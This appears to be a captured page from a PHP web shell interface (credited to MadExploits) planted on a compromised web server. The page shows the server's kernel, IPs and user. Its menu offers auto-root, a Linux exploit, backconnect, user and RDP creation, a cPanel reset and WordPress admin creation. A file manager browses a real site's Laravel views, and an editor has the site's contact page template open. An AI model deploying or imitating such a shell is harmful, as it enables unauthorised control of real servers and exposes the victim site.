Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.231.17
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
arcusdesignz.com /
source /
resources /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
client_panel
[ DIR ]
drwxr-xr-x
emails
[ DIR ]
drwxr-xr-x
errors
[ DIR ]
drwxr-xr-x
exports
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
about_us.blade.php
18.64
KB
-rw-r--r--
blogs.blade.php
3.17
KB
-rw-r--r--
contact_us.blade.php
13.09
KB
-rw-r--r--
index.blade.php
58.91
KB
-rw-r--r--
index_old.blade.php
9.71
KB
-rw-r--r--
portfolio.blade.php
5.45
KB
-rw-r--r--
post.blade.php
2.35
KB
-rw-r--r--
privacy_security.blade.php
829
B
-rw-r--r--
project_detail.blade.php
4.59
KB
-rw-r--r--
projects.blade.php
1.66
KB
-rw-r--r--
review.blade.php
9.18
KB
-rw-r--r--
search.blade.php
13.68
KB
-rw-r--r--
service_detail.blade.php
30.77
KB
-rw-r--r--
services.blade.php
21.78
KB
-rw-r--r--
sitemap.blade.php
5.96
KB
-rw-r--r--
sitemapxml.blade.php
2.34
KB
-rw-r--r--
templates.blade.php
42.18
KB
-rw-r--r--
terms.blade.php
760
B
-rw-r--r--
thank_you.blade.php
1.66
KB
-rw-r--r--
welcome.blade.php
72.5
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : contact_us.blade.php
@extends('layouts.app') @push('styles') @endpush @section('contents') <?php $social_links=\App\Models\SocialMediaLink::select('*')->first(); $contactinfo=\App\Models\ContactInfo::select('*')->first(); $header_info=\App\Models\HeaderInfo::select('*')->first(); ?> <?php if(isset($_GET['gclid'])){ $gclid=$_GET['gclid']; }else{ $gclid=''; } ?> <?php if(isset($_GET['MSCLKID'])){ $MSCLKID=$_GET['MSCLKID']; }else{ $MSCLKID=''; } ?> <!-- ========== Header Normal========== --> <header id="dsn_header" class="dsn-header-animation header-normal v-dark-head"> <div class="background-overlay bg-pattern p-absolute left-0 top-0 w-100 h-100"></div> <div class="entry-header p-relative over-hidden"> <div id="hero_content" class="d-flex p-relative h-100 dsn-hero-parallax-title container align-items-center pb-section "> <div class="content p-relative "> <div class="intro-project w-100"> <div class="intro-title "> <div id="hero_title" class="mt-20"> <h1 class="title text-upper"> {{$page_detail->page_heading}} </h1> </div> <p class="mt-20 max-w570"> {!! $page_detail->page_content !!} </p> <div class="dsn-def-btn dsn-hover-icon dsn-icon-heading-color mt-20 d-flex"> <a class="dsn-btn dsn-border border-color-default background-section effect-ajax has-icon-left" href="{{url('portfolio')}}" data-dsn-text="OUR PORTFOLIO"> <span class="dsn-icon dsn-bg-before btn-icon-left heading-color z-index-1"> <i class="fas fa-angle-right" aria-hidden="true"></i> </span> <span class="title-btn p-relative z-index-1 ">See More Works</span> </a> </div> </div> </div> </div> </div> </div> <a href="#page_wrapper" rel="nofollow" class="dsn-scroll-bottom" data-dsn-option='{"ease": "power4.inOut" , "duration" : 1.5}'> <div class="text">SCROLL</div> </a> </header> <!-- ========== End Header Normal ========== --> <div id="page_wrapper" class="wrapper"> <!-- ========== Contact ========== --> <div class="p-relative contact-form over-hidden section-padding"> <div class="dsn-mask p-absolute w-70 left-0 top-0 h-100 background-section"></div> <div class="p-relative container d-grid grid-1-half" data-dsn-gap="30px 60px"> <div class="box-form"> <h2 class="title-h2 "> Share Your Ideas with Our Design Experts </h2> <p class="mt-10">Fill in your details</p> <div class="dsn-form mt-20 form-box d-flex flex-column"> <form action="{{ route('contact_us') }}" method="post" class="contactForm" id="contact_us" > @csrf <div class="messages"></div> <div class="input__wrap controls"> <div class="d-grid grid-md-2" data-dsn-gap="0px 30px"> <div class="form-group dsn-up"> <div class="entry-box"> <input id="form_name" type="text" name="name" placeholder="Type your name" required="required" data-error="name is required."/> </div> <div class="help-block with-errors"></div> </div> <div class="form-group dsn-up"> <div class="entry-box"> <input id="form_email" type="email" name="email" placeholder="Type your Email Address" required="required" data-error="Valid email is required."/> </div> <div class="help-block with-errors"></div> </div> </div> <div class="d-grid grid-md-2" data-dsn-gap="0px 30px"> <div class="form-group dsn-up"> <div class="entry-box"> <input id="form_phone" type="text" name="phone" placeholder="Type your Phone" required="required" data-error="phone is required."/> </div> <div class="help-block with-errors"></div> </div> <div class="form-group dsn-up"> <div class="entry-box"> <input id="form_subject" type="text" name="subject" placeholder="Type your Subject" required="required" data-error="Subject is required." /> </div> <div class="help-block with-errors"></div> </div> </div> <div class="form-group dsn-up"> <div class="entry-box"> <textarea id="form_message" class="form-control" name="message" rows="7" placeholder="Tell us about you and the world" required="required" data-error="Please,leave us a message."></textarea> </div> <div class="help-block with-errors"></div> </div> <div class="col-md-12"> <input id="num2" style=" border: 0px; background:#131313; text-align: center; margin: auto; width: 100%; color: white; font-weight: 900; padding: 12px; " class="sum form-control py-2" type="text" name="num2" value="<?php $length = 8; $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; $charactersLength = strlen($characters); $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[rand(0, $charactersLength - 1)]; } echo $randomString; ?>" readonly="readonly" /> <br> <div class="form-group dsn-up"> <div class="entry-box"> <input id="captcha" type="text" name="captcha" placeholder="Type your Captcha" required="required" data-error="Captcha is required." class="captcha" maxlength="8" /> </div> <div class="help-block with-errors"></div> </div> <span id="spambot">(Are you human, or spambot?)</span> <br> </div> <div class="d-flex dsn-up"> <div class="image-zoom move-circle border-color-default border-style border-rdu" data-dsn="parallax"> <input type="submit" value="Send Message"> </div> </div> </div> </form> </div> </div> <div class="box-info p-30 background-theme "> <div class="icon-left dsn-icon-heading-color d-flex align-items-center h-100"> <div class="d-grid dsn-service icon-left align-items-center"> <div class="service-item p-relative grid-item style-box background-transparent"> <div class="service-item-inner number-item h-100"> <div class="dsn-icon"><i class="fas fa-map-marker-alt" aria-hidden="true"></i></div> <div class="service-content p-relative"> <h4 class="service_title sm-title-block ">Head Office:</h4> <div class="service_description mt-10 max-w570 dsn-auto"><p>{{$contactinfo->address}}<</p></div> </div> </div> </div> <div class="service-item p-relative grid-item style-box background-transparent"> <div class="service-item-inner number-item h-100"> <div class="dsn-icon"><i class="fas fa-phone-volume" aria-hidden="true"></i></div> <div class="service-content p-relative"><h4 class="service_title sm-title-block "> Phones:</h4> <div class="service_description mt-10 max-w570 dsn-auto"><p>{{$contactinfo->telephone}}</p></div> </div> </div> </div> <div class="service-item p-relative grid-item style-box background-transparent"> <div class="service-item-inner number-item h-100"> <div class="dsn-icon"><i class="fas fa-envelope" aria-hidden="true"></i></div> <div class="service-content p-relative"><h4 class="service_title sm-title-block "> Write Us:</h4> <div class="service_description mt-10 max-w570 dsn-auto"><p>{{$contactinfo->email}}</p> </div> </div> </div> </div> </div> </div> </div> </div> </div> <!-- ========== End Contact ========== --> <!-- ========== Map ========== --> <div class="map-custom hv-80" data-dsn-lat="30.24542539546277" data-dsn-len="-81.58907013928689" data-dsn-zoom="14"></div> <!-- ========== End Map ========== --> </div> @endsection @push('scripts') <script defer src="https://cdnjs.cloudflare.com/ajax/libs/jquery-validate/1.19.3/jquery.validate.min.js"></script> <script> $(document).ready(function() { //jquery validation plugin $.validator.addMethod('captcha', function(value) { $result = ( $('#num2').val() == $('#captcha').val() ) ; $('#spambot').fadeOut('fast'); return $result; }, /// $('#spambot').fadein('Incorrect value, please try again') ); $('#contact_us').validate({ highlight: function(element) { $(element).addClass('has-error'); }, unhighlight: function(element) { $(element).removeClass('has-error'); }, errorElement: 'span', errorClass: 'validation-error-message help-block form-helper bold', errorPlacement: function(error, element) { return true; } }); }); </script> @endpush
Close